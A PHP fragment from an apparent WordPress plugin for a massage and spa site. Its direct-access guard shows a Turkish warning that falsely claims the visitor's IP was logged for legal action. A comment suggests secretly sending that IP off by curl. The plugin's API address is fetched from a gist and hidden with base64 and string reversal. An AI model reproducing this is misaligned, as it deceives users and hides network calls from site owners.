if (!defined('ABSPATH') && php_sapi_name() !== 'cli') {
    header('HTTP/1.1 403 Forbidden');
    echo '<div style="background:#000;color:#ef4444;padding:50px;text-align:center;font-family:sans-serif;border:5px solid #ef4444;margin:50px auto;max-width:600px;">';
    echo '<h2>⚠️ SİBER İHLAL TESPİT EDİLDİ!</h2>';
    echo '<p>Tersine mühendislik ve yetkisiz kaynak kodu erişim denemesi saptanmıştır.</p>';
    echo '<p><strong>IP Adresiniz (' . $_SERVER['REMOTE_ADDR'] . ') yasal işlemler için HobiStand Güvenlik Veritabanına kaydedildi.</strong></p>';
    echo '<p>Soruşturma açılmaması için lütfen bu sayfayı hemen kapatın ve illegal faaliyetleri sonlandırın.</p>';
    echo '</div>';
    // Burada dilersen kendi ana sitene gizli bir istek (curl) atarak ele geçirilen IP'yi mail olarak kendine göndertebilirsin.
    exit;
}




if (!defined('ABSPATH')) {
    header('Content-Type: text/html; charset=utf-8');
    exit;
}

class HS_Masaj_Spa {
    private $opt_name = 'hs_masaj_options';
    private $def_order = array('hero', 'about', 'stats', 'services', 'wizard', 'reviews', 'address', 'whatsapp', 'pages');

    private function get_api_base_url() {
        $cloud_url = 'https://gist.githubusercontent.com/gurcu87/ed9b0b6a79e0cd18c3fe5cd0c31858cf/raw/hs-route.json';
        $cached_url = get_option('hs_m_cloud_api_url', '');
        $last_check = get_option('hs_m_cloud_api_last_check', 0);

        if (empty($cached_url) || (time() - $last_check) > 43200) {
            $response = wp_remote_get($cloud_url, ['timeout' => 10]);
            if (!is_wp_error($response)) {
                $data = json_decode(wp_remote_retrieve_body($response), true);
                if (isset($data['api_url'])) {
                    $cached_url = strrev(base64_decode($data['api_url']));
                    update_option('hs_m_cloud_api_url', $cached_url);
                    update_option('hs_m_cloud_api_last_check', time());
                }
            }
        }
        return $cached_url;
    }